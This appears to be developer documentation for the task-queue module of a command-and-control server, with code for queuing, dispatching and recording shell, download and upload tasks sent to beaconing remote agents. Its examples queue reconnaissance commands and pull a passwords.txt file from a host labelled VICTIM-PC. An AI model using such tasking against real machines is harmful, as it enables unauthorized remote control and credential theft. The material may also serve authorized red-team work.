Overview
CommandQueue manages pending tasks for all agent sessions using asyncio queues. Each session has its own queue, and all tasks are persisted to the database for durability across server restarts.
Source: server/command_queue.py
TaskStatus Enum
class TaskStatus(str, Enum):
    PENDING = 'PENDING'
    DISPATCHED = 'DISPATCHED'
    COMPLETE = 'COMPLETE'
    ERROR = 'ERROR'
Represents the lifecycle state of a task.
PENDING: Task queued, waiting to be sent to the agent
DISPATCHED: Task sent to the agent, awaiting result
COMPLETE: Task executed successfully, result stored
ERROR: Task execution failed or timed out
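The four states above suggest a small state machine. The following is a minimal sketch, assuming tasks only move forward and that COMPLETE and ERROR are terminal; the `ALLOWED_TRANSITIONS` table and the `can_transition` helper are hypothetical and are not part of server/command_queue.py.

```python
from enum import Enum


class TaskStatus(str, Enum):
    PENDING = 'PENDING'
    DISPATCHED = 'DISPATCHED'
    COMPLETE = 'COMPLETE'
    ERROR = 'ERROR'


# Hypothetical transition table (an assumption, not taken from the source):
# a task only moves forward, and COMPLETE / ERROR are terminal states.
ALLOWED_TRANSITIONS = {
    TaskStatus.PENDING: {TaskStatus.DISPATCHED, TaskStatus.ERROR},
    TaskStatus.DISPATCHED: {TaskStatus.COMPLETE, TaskStatus.ERROR},
    TaskStatus.COMPLETE: set(),
    TaskStatus.ERROR: set(),
}


def can_transition(current: TaskStatus, new: TaskStatus) -> bool:
    """Return True if the table allows moving from `current` to `new`."""
    return new in ALLOWED_TRANSITIONS[current]
```

Because TaskStatus mixes in str, each member compares equal to its string value, so a status read back from a text column can be restored with `TaskStatus('PENDING')`.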
Task Dataclass
@dataclass
class Task:
    task_id: str
    session_id: str
    command: str
    args: list
    timeout_s: int
    queued_at: float
    status: TaskStatus = TaskStatus.PENDING
Represents a single command task for an agent.
task_id: UUID of the task
session_id: UUID of the agent session this task belongs to
command: Command type (shell, download, upload, sleep, etc.)
args: Command-specific arguments. Example: ["whoami"] for a shell command
timeout_s: Maximum execution time in seconds before timeout
queued_at: Unix timestamp when the task was queued
status (TaskStatus, default: PENDING): Current task status
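To make the field descriptions concrete, here is a minimal sketch of creating a Task and flattening it into plain values. The `new_task` and `to_row` helpers are hypothetical names introduced for illustration; the real module may build and store tasks differently.

```python
import time
import uuid
from dataclasses import asdict, dataclass
from enum import Enum


class TaskStatus(str, Enum):
    PENDING = 'PENDING'
    DISPATCHED = 'DISPATCHED'
    COMPLETE = 'COMPLETE'
    ERROR = 'ERROR'


@dataclass
class Task:
    task_id: str
    session_id: str
    command: str
    args: list
    timeout_s: int
    queued_at: float
    status: TaskStatus = TaskStatus.PENDING


def new_task(session_id: str, command: str, args: list, timeout_s: int) -> Task:
    """Hypothetical helper: fill in the generated fields for a fresh task."""
    return Task(
        task_id=str(uuid.uuid4()),   # random UUID as a string
        session_id=session_id,
        command=command,
        args=args,
        timeout_s=timeout_s,
        queued_at=time.time(),       # Unix timestamp in seconds
    )


def to_row(task: Task) -> dict:
    """Hypothetical helper: flatten a Task into plain values for storage."""
    row = asdict(task)
    row['status'] = task.status.value  # store the plain string, not the Enum member
    return row
```

The status field is the only one with a default, so it must stay last in the dataclass definition.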
CommandQueue Class
Constructor
Initializes an empty command queue with an asyncio lock.
Internal State:
self._queues: dict[str, asyncio.Queue] = {}  # session_id -> Queue[Task]
self._tasks: dict[str, Task] = {}  # task_id -> Task (for O(1) lookup)
self._lock = asyncio.Lock()
Architecture:
One asyncio.Queue per session for FIFO task ordering
Flat task registry for fast lookups by task_id
Lock for coroutine-safe concurrent access (asyncio.Lock coordinates coroutines on a single event loop; it is not thread-safe)
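The role of the lock can be illustrated with a small sketch, independent of CommandQueue. It assumes the critical section contains an await (here `asyncio.sleep(0)` stands in for an awaited database write), which is where other coroutines could otherwise interleave. All function names are hypothetical.

```python
import asyncio


async def unguarded_increment(state: dict) -> None:
    current = state['count']
    await asyncio.sleep(0)          # stand-in for an awaited database write
    state['count'] = current + 1    # may overwrite another coroutine's update


async def guarded_increment(state: dict, lock: asyncio.Lock) -> None:
    async with lock:                # only one coroutine at a time runs this block
        current = state['count']
        await asyncio.sleep(0)
        state['count'] = current + 1


async def compare(workers: int = 50) -> tuple[int, int]:
    """Run both variants concurrently and return (unguarded, guarded) totals."""
    lock = asyncio.Lock()
    unguarded = {'count': 0}
    guarded = {'count': 0}
    await asyncio.gather(*(unguarded_increment(unguarded) for _ in range(workers)))
    await asyncio.gather(*(guarded_increment(guarded, lock) for _ in range(workers)))
    return unguarded['count'], guarded['count']
```

Calling `asyncio.run(compare())` shows the unguarded total falling short of the worker count while the guarded total matches it. The lock does not protect against access from other threads.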
Methods
enqueue_task()
async def enqueue_task(self, session_id: str, command: str, args: list,
                       timeout_s: int, db: Database) -> str
Creates a Task, adds it to the session queue, persists it to the DB, and returns the task_id.
session_id: UUID of the agent session to receive this task
command: Command type (shell, download, upload, sleep, etc.)
args: Command-specific arguments
timeout_s: Maximum execution time in seconds
db: Database instance for persistence
Returns: Newly created task_id (UUID)
Example:
import asyncio

from server.command_queue import CommandQueue
from server.storage import Database

# The awaits must run inside a coroutine, so the example is wrapped in main()
async def main():
    async with Database() as db:
        cq = CommandQueue()
        # Queue a shell command
        task_id = await cq.enqueue_task(
            session_id='550e8400-e29b-41d4-a716-446655440000',
            command='shell',
            args=['whoami'],
            timeout_s=30,
            db=db,
        )
        print(f"Task queued: {task_id}")
        # Queue a file download
        task_id2 = await cq.enqueue_task(
            session_id='550e8400-e29b-41d4-a716-446655440000',
            command='download',
            args=['C:\\Users\\jdoe\\passwords.txt'],
            timeout_s=60,
            db=db,
        )

asyncio.run(main())
Behavior:
Generates new UUID for task_id
Sets queued_at to current time
Sets status to PENDING
Adds task to session’s queue (creates queue if needed)
Stores task in flat registry
Persists to database
Logs enqueue event
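The seven steps above can be sketched as follows. This is not the code in server/command_queue.py: `FakeDatabase` and its `insert_task` method are hypothetical stand-ins for the real Database class, and `EnqueueSketch` only mirrors the documented state layout.

```python
import asyncio
import logging
import time
import uuid
from dataclasses import dataclass

logger = logging.getLogger('enqueue_sketch')


@dataclass
class Task:
    task_id: str
    session_id: str
    command: str
    args: list
    timeout_s: int
    queued_at: float
    status: str = 'PENDING'  # plain string here to keep the sketch short


class FakeDatabase:
    """Hypothetical in-memory stand-in for the real Database class."""

    def __init__(self) -> None:
        self.task_rows: dict[str, Task] = {}

    async def insert_task(self, task: Task) -> None:  # assumed method name
        self.task_rows[task.task_id] = task


class EnqueueSketch:
    def __init__(self) -> None:
        self._queues: dict[str, asyncio.Queue] = {}
        self._tasks: dict[str, Task] = {}
        self._lock = asyncio.Lock()

    async def enqueue_task(self, session_id, command, args, timeout_s, db) -> str:
        task = Task(
            task_id=str(uuid.uuid4()),           # 1. generate a new UUID
            session_id=session_id,
            command=command,
            args=args,
            timeout_s=timeout_s,
            queued_at=time.time(),               # 2. record the current time
        )                                        # 3. status defaults to PENDING
        async with self._lock:
            if session_id not in self._queues:   # 4. create the queue on first use
                self._queues[session_id] = asyncio.Queue()
            self._queues[session_id].put_nowait(task)
            self._tasks[task.task_id] = task     # 5. store in the flat registry
            await db.insert_task(task)           # 6. persist
        logger.info('task enqueued',             # 7. log the event
                    extra={'session_id': session_id, 'task_id': task.task_id})
        return task.task_id
```

In this sketch the database write happens while the lock is held, so the in-memory state and the stored row change together; whether the real implementation does the same is not stated in the source.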
peek_task()
async def peek_task(self, session_id: str, db: Database = None) -> Task | None
Returns the next PENDING task for a session without removing it from the queue.
session_id: UUID of the agent session
db: Optional database instance. If provided, the DB is checked for tasks not yet loaded into memory.
Returns: Next PENDING task if available, None if the session has no PENDING task
Example:
# Agent polls for next task
task = await cq.peek_task(session_id, db=db)
if task:
    print(f"Dispatching: {task.command} {task.args}")
    await cq.mark_dispatched(task.task_id, db)
else:
    print("No pending tasks")
Behavior:
Memory Check: Searches in-memory queue for PENDING tasks
Database Fallback: If no task in memory and db provided, queries database
Lazy Load: If task found in DB, loads into memory and adds to queue
Non-Destructive: Task remains in queue until status changes
Use Case: Server restart - tasks persist in DB and are loaded on first peek
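The memory check, database fallback, and lazy load described above can be sketched as follows. Several things here are assumptions: the sketch uses a `collections.deque` per session instead of asyncio.Queue (which has no public peek operation), and `FakeDatabase.get_pending_tasks` is a hypothetical method name standing in for whatever query the real Database exposes.

```python
import asyncio
from collections import deque
from dataclasses import dataclass


@dataclass
class Task:
    task_id: str
    session_id: str
    command: str
    status: str = 'PENDING'


class FakeDatabase:
    """Hypothetical in-memory stand-in for the real Database class."""

    def __init__(self, rows: list) -> None:
        self.rows = rows

    async def get_pending_tasks(self, session_id: str) -> list:  # assumed name
        return [Task(**r) for r in self.rows
                if r['session_id'] == session_id and r['status'] == 'PENDING']


class PeekSketch:
    def __init__(self) -> None:
        self._queues: dict[str, deque] = {}
        self._tasks: dict[str, Task] = {}
        self._lock = asyncio.Lock()

    async def peek_task(self, session_id: str, db=None):
        async with self._lock:
            queue = self._queues.setdefault(session_id, deque())
            # Memory check: first PENDING task in FIFO order, left in place
            for task in queue:
                if task.status == 'PENDING':
                    return task
            if db is None:
                return None
            # Database fallback + lazy load: add rows not yet known in memory
            for task in await db.get_pending_tasks(session_id):
                if task.task_id not in self._tasks:
                    self._tasks[task.task_id] = task
                    queue.append(task)
            return next((t for t in queue if t.status == 'PENDING'), None)
```

Checking `task_id` against the flat registry before loading keeps a task that was already dispatched in memory from being re-queued if its stored row still reads PENDING.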
mark_dispatched()
async def mark_dispatched(self, task_id: str, db: Database) -> None
Sets task status to DISPATCHED in memory and in the DB.
task_id: UUID of the task to mark dispatched
db: Database instance for persistence
Example:
task = await cq.peek_task(session_id, db=db)
if task:
    # Send task to agent via beacon response
    await cq.mark_dispatched(task.task_id, db)
Behavior:
Updates task.status = TaskStatus.DISPATCHED in memory
Persists to database
Logs dispatch event
Next peek_task() call will skip this task (no longer PENDING)
mark_complete()
async def mark_complete(self, task_id: str, result: dict,
                        db: Database) -> None
Sets task status to COMPLETE and persists the result to the DB.
task_id: UUID of the completed task
result: Task execution result containing:
    stdout: Command standard output
    stderr: Command standard error
    exit_code: Process exit code
    duration_ms: Execution duration in milliseconds
db: Database instance for persistence
Example:
# Agent submits task result
result = {
    'stdout': 'VICTIM-PC\\jdoe',
    'stderr': '',
    'exit_code': 0,
    'duration_ms': 42,
}
await cq.mark_complete(task_id, result, db)
# Result now available via CLI or web UI
Behavior:
Updates task.status = TaskStatus.COMPLETE in memory
Persists status to database
Inserts result row into database with generated result_id
Logs completion with exit_code
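Since mark_complete() takes the result as a plain dict, a caller may want to check its shape before passing it in. The sketch below is one way to do that; `TaskResult` and `validate_result` are hypothetical names, and nothing in the source says the real method performs such a check.

```python
from typing import TypedDict


class TaskResult(TypedDict):
    stdout: str
    stderr: str
    exit_code: int
    duration_ms: int


_FIELD_TYPES = {'stdout': str, 'stderr': str, 'exit_code': int, 'duration_ms': int}


def validate_result(result: dict) -> TaskResult:
    """Hypothetical check: raise ValueError unless all four documented
    fields are present and have the documented types."""
    for name, expected in _FIELD_TYPES.items():
        if name not in result:
            raise ValueError(f'missing result field: {name}')
        value = result[name]
        # bool is a subclass of int, so reject it explicitly
        if isinstance(value, bool) or not isinstance(value, expected):
            raise ValueError(f'{name} must be {expected.__name__}')
    # Keep only the documented fields
    return TaskResult(**{name: result[name] for name in _FIELD_TYPES})
```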
mark_error()
async def mark_error(self, task_id: str, db: Database) -> None
Sets task status to ERROR in memory and in the DB.
task_id: UUID of the failed task
db: Database instance for persistence
Example:
# Agent reports task timeout or execution failure
await cq.mark_error(task_id, db)
Behavior:
Updates task.status = TaskStatus.ERROR in memory
Persists to database
Logs error event
Use Cases:
Task timeout on agent
Command execution failure
Agent crash during execution
get_tasks_for_session()
async def get_tasks_for_session(self, session_id: str) -> list[Task]
Returns all in-memory tasks for a session ordered by queued_at.
session_id: UUID of the agent session
Returns: List of Task objects sorted by queued_at ascending (oldest first)
Example:
tasks = await cq.get_tasks_for_session(session_id)
for task in tasks:
    status_icon = {
        TaskStatus.PENDING: '⏳',
        TaskStatus.DISPATCHED: '📤',
        TaskStatus.COMPLETE: '✓',
        TaskStatus.ERROR: '✗',
    }[task.status]
    # Use .value: on Python 3.11+ formatting a (str, Enum) member prints 'TaskStatus.COMPLETE'
    print(f"{status_icon} {task.command} {task.args} - {task.status.value}")
Output:
✓ shell ['whoami'] - COMPLETE
📤 download ['C:\\passwords.txt'] - DISPATCHED
⏳ shell ['ipconfig'] - PENDING
Use Cases:
CLI tasks command
Web UI task history
Operator monitoring
Usage Patterns
Complete Task Lifecycle
from server.command_queue import CommandQueue, TaskStatus
from server.storage import Database

# Wrapper added so the awaits run inside a coroutine
async def run_lifecycle(session_id: str) -> None:
    async with Database() as db:
        cq = CommandQueue()
        # Operator queues command via CLI
        task_id = await cq.enqueue_task(
            session_id=session_id,
            command='shell',
            args=['whoami'],
            timeout_s=30,
            db=db,
        )
        # Agent beacons and pulls task
        task = await cq.peek_task(session_id, db=db)
        if task:
            # Server sends task to agent
            await cq.mark_dispatched(task.task_id, db)
            # Agent executes and returns result
            result = {
                'stdout': 'VICTIM-PC\\jdoe',
                'stderr': '',
                'exit_code': 0,
                'duration_ms': 42,
            }
            await cq.mark_complete(task_id, result, db)
        # Operator views results
        tasks = await cq.get_tasks_for_session(session_id)
        for t in tasks:
            if t.status == TaskStatus.COMPLETE:
                # Fetch result from database
                results = await db.get_results_for_session(session_id)
                print(results[0]['stdout'])
Error Handling
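import time

# Agent timeout
if task_duration > task.timeout_s:
    await cq.mark_error(task_id, db)
# Agent crash detection (server-side)
# Only DISPATCHED tasks qualify. queued_at counts from enqueue time, not dispatch time,
# so a task that waited a long time in the queue can trip this check early.
if (task.status == TaskStatus.DISPATCHED
        and time.time() - task.queued_at > task.timeout_s * 2):
    # Task dispatched but no result received
    await cq.mark_error(task_id, db)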
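The server-side check above can be factored into a pure function that is easy to test. This is a sketch under stated assumptions: `find_stale_dispatched` and `grace_factor` are hypothetical names, the Task here carries only the fields the check needs, and age is measured from queued_at because the documented Task has no dispatch timestamp.

```python
from dataclasses import dataclass


@dataclass
class Task:
    task_id: str
    timeout_s: int
    queued_at: float
    status: str = 'PENDING'


def find_stale_dispatched(tasks, now: float, grace_factor: float = 2.0) -> list:
    """Return DISPATCHED tasks whose age exceeds timeout_s * grace_factor.

    PENDING tasks are skipped (they have not been sent yet), and finished
    tasks are skipped because they already have a final status.
    """
    return [
        t for t in tasks
        if t.status == 'DISPATCHED'
        and now - t.queued_at > t.timeout_s * grace_factor
    ]
```

A periodic job could pass the current `time.time()` as `now` and call mark_error() for each returned task. Recording a separate dispatch timestamp would make the age measurement more precise.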
Queue Priority
Tasks are dispatched in FIFO order per session:
# Queue multiple tasks
await cq.enqueue_task(sid, 'shell', ['whoami'], 30, db)
await cq.enqueue_task(sid, 'shell', ['hostname'], 30, db)
await cq.enqueue_task(sid, 'shell', ['ipconfig'], 30, db)
# peek_task() always returns the oldest PENDING task
task1 = await cq.peek_task(sid, db)  # Returns the 'whoami' task
await cq.mark_dispatched(task1.task_id, db)
task2 = await cq.peek_task(sid, db)  # Returns the 'hostname' task
await cq.mark_dispatched(task2.task_id, db)
task3 = await cq.peek_task(sid, db)  # Returns the 'ipconfig' task
Integration Points
Server Main
Used in server_main.py beacon handlers:
from server.command_queue import CommandQueue
cmd_queue = CommandQueue()
# Task pull handler
task = await cmd_queue.peek_task(session_id, db=db)
if task:
    await cmd_queue.mark_dispatched(task.task_id, db)
    return task_dispatch_response(task)
# Task result handler
await cmd_queue.mark_complete(task_id, result_payload, db)
CLI Commands
Used in cli/task_commands.py:
# Queue new task
task_id = await cmd_queue.enqueue_task(
    session_id, command, args, timeout_s, db
)
# View task history
tasks = await cmd_queue.get_tasks_for_session(session_id)
for task in tasks:
    display_task(task)
Testing
Self-Test Suite
Run built-in tests:
python -m server.command_queue
Test Coverage:
enqueue_task generates valid UUID
peek_task returns PENDING task
peek_task is non-destructive
mark_dispatched excludes task from future peeks
mark_complete stores result in DB
get_tasks_for_session ordering
peek_task returns None for unknown session
mark_error sets ERROR status
Output:
Running command_queue self-test...
[OK] enqueue_task
[OK] peek_task returns PENDING task
[OK] peek_task is non-destructive
[OK] mark_dispatched
[OK] mark_complete
[OK] get_tasks_for_session ordering
[OK] peek_task returns None for unknown session
[OK] mark_error
All command_queue self-tests passed.
Performance notes:
All queued and in-flight tasks are held in memory. 10,000 tasks consume roughly 5-10 MB of RAM.
enqueue_task and peek_task are O(1) for in-memory operations. The database fallback in peek_task adds query latency.
Completed tasks remain in memory indefinitely. Consider periodic cleanup for long-running operations.
A single lock protects all queues, so high task throughput may cause contention. Consider per-session locks when scaling.
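The per-session locking idea can be sketched as below. This is an illustration of the suggestion, not something the current module is documented to do; `PerSessionLocks`, `for_session`, and `work` are hypothetical names. The event log shows that coroutines for different sessions overlap, while coroutines for the same session still run one at a time.

```python
import asyncio
from collections import defaultdict


class PerSessionLocks:
    """Hypothetical helper: one asyncio.Lock per session_id, created on first use."""

    def __init__(self) -> None:
        self._locks: dict[str, asyncio.Lock] = defaultdict(asyncio.Lock)

    def for_session(self, session_id: str) -> asyncio.Lock:
        return self._locks[session_id]


async def work(locks: PerSessionLocks, session_id: str, events: list) -> None:
    async with locks.for_session(session_id):
        events.append(f'{session_id}:start')
        await asyncio.sleep(0)  # stand-in for an awaited database write
        events.append(f'{session_id}:end')


async def demo(first: str, second: str) -> list:
    """Run two workers concurrently and return the order of their events."""
    locks = PerSessionLocks()
    events: list = []
    await asyncio.gather(work(locks, first, events), work(locks, second, events))
    return events
```

The flat task_id registry is shared across sessions, so a design like this would still need some protection for writes that touch it.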
Logging
Structured logging with contextual fields:
logger.info('task enqueued', extra={
    'session_id': session_id,
    'task_id': task.task_id,
    'command': command,
})
Events:
Task enqueued
Task loaded from DB
Task dispatched
Task complete
Task error
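Fields passed through `extra` become attributes on the log record, but the default formatter does not print them. The following sketch shows one way to surface them as JSON; `ContextFormatter` and the logger name are hypothetical, and the project's actual logging configuration is not shown in the source.

```python
import io
import json
import logging


class ContextFormatter(logging.Formatter):
    """Hypothetical formatter: emit the message plus known context fields as JSON."""

    FIELDS = ('session_id', 'task_id', 'command')

    def format(self, record: logging.LogRecord) -> str:
        payload = {'level': record.levelname, 'event': record.getMessage()}
        for name in self.FIELDS:
            if hasattr(record, name):  # only present when passed via extra=
                payload[name] = getattr(record, name)
        return json.dumps(payload)


# Write to an in-memory stream so the output can be inspected
stream = io.StringIO()
handler = logging.StreamHandler(stream)
handler.setFormatter(ContextFormatter())

logger = logging.getLogger('logging_sketch')
logger.setLevel(logging.INFO)
logger.addHandler(handler)
logger.propagate = False  # keep the demo output out of the root logger

logger.info('task enqueued', extra={
    'session_id': 's1',
    'task_id': 't1',
    'command': 'shell',
})
```

Records logged without `extra` still format cleanly, because missing fields are skipped rather than raising an error.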
Related components:
Server Main: Beacon endpoint integration
Database: Task and result persistence
SessionManager: Session state management
Task Commands: CLI task management